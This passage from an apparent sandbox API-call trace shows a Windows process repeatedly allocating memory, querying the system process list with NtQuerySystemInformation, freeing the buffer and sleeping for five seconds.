BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.116] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.123] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.139] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.192] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.217] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.227] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.234] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.241] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.249] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.256] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.270] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.278] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.286] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.335] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.337] NtQuerySystemInformation (in: 